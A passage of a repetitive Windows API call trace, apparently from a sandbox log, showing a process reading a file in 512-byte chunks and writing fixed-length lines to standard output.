hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.732] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.732] GetFileType (hFile=0x4c) returned 0x1 [0112.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.733] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.733] GetFileType (hFile=0x4c) returned 0x1 [0112.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.734] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.734] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.735] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.735] GetFileType (hFile=0x4c) returned 0x1 [0112.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.736] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.736] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.737] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.737] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.738] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.738] GetFileType (hFile=0x4c) returned 0x1 [0112.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] GetFileType (hFile=0x4c) returned 0x1 [0112.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.739] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 